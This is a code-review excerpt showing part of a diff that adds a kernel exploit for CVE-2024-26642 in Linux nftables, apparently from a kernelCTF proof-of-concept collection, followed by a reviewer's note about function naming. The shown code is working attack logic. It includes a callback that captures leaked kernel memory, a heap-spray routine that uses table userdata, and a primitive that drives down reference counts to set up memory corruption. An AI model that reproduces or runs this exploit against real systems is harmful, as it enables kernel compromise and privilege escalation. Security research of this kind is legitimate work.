pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit.c

```diff
@@ -0,0 +1,502 @@
+        nla_parse_nested(tb_msg2, NFTA_SET_MAX, tb_msg[NFTA_SET_ELEM_LIST_ELEMENTS],NULL);
+
+        struct nlattr * tb_msg3[NFTA_SET_MAX+1];
+        memset(tb_msg3, 0, NFTA_SET_MAX * 8);
+        nla_parse_nested(tb_msg3, NFTA_SET_MAX, tb_msg2[1],NULL);
+        char *val = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
+        nla_memcpy(val, tb_msg3[NFTA_SET_ELEM_KEY], nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
+        //printf("Get key : %llx\n", *(uint64_t *)(val+4));
+        uint32_t udata_len = nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]);
+        if(udata_len != 0xa1)
+		printf("udata len : %d\n",udata_len);
+        if(udata_len > 0xb0){
+            //get leak
+            printf("udata len : %d\n",udata_len);
+            leak_data = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            memset(leak_data,0,nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            nla_memcpy(leak_data, tb_msg3[NFTA_SET_ELEM_USERDATA], nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            printf("Target key : %llx\n",*(uint64_t *)(val+4));
+        }
+    }
+    else
+        printf("No NFTA_SET_ELEM_LIST_ELEMENTS\n");
+    return NL_OK;
+}
+
+/*
+ Spray the heap through the udata of nft_table. In nftables, when creating a table, 
+ you can let the kernel malloc and fill any size of heap memory by using NFTA_TABLE_USERDATA 
+ (the corresponding code is in the function nf_tables_newtable). 
+*/
+
+
+void spray_tables(struct nl_sock * socket, int count, char *udata, int size){
+   char *tmp = malloc(0x100);
+   memset(tmp,0,0x100);
+   int i;
+   for(i=0;i<count;i++){
+        snprintf(tmp, 0x100, "table_for_leak_%ld", table_num);
+        new_table_with_udata(socket, tmp, udata, size);
+        ++table_num;
+   }
+   free(tmp);
+}
+
+
+//make target_obj->use = target_obj->use - repeat_time
+
+void primitive_0(struct nl_sock *socket, char *table, char *target_obj, int repeat_time){
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    int i,j;
+    struct nlmsghdr **msg_list = malloc(sizeof(struct nlmsghdr *)*0x100);
+    char *key = malloc(0x40);
+    char *set_name = "set for primitive0";
+    char *chain_name = "chain for primitive0";
+    msg_list[0] = new_set_pipapo_for_timeout_with_anonymous_msg(table, set_name, NFT_OBJECT_CT_EXPECT);
+    for(i=0;i<repeat_time;i++){ 
+	*(uint64_t *)key = i;
+	msg_list[i+1] = new_setelem_with_expiration_msg(table, set_name, pad, 0xc0, target_obj, key, 0x40, NULL, 0, 0,0x0100000000000000);
+    }    
+    msg_list[repeat_time+1] = new_chain_msg(table, chain_name, 0);
+    msg_list[repeat_time+2] = new_rule_lookup_for_chain_msg(table, chain_name, set_name, 0);
+    msg_list[repeat_time+3] = del_chain_msg(table, chain_name);
+    send_msg_list(socket, msg_list, repeat_time+4);
+    
+    free(msg_list);
+    free(pad);
+}
+
+//make target_chain->use = target_chain->use - repeat_time
+
+void primitive_1(struct nl_sock *socket, char *table, char *target_chain, int repeat_time){
```

Comment:
Comments are explaining what the `primitive_1` does, but also consider choosing a descriptive function name as well, e.g. `primitive_decrease_nft_chain_use`.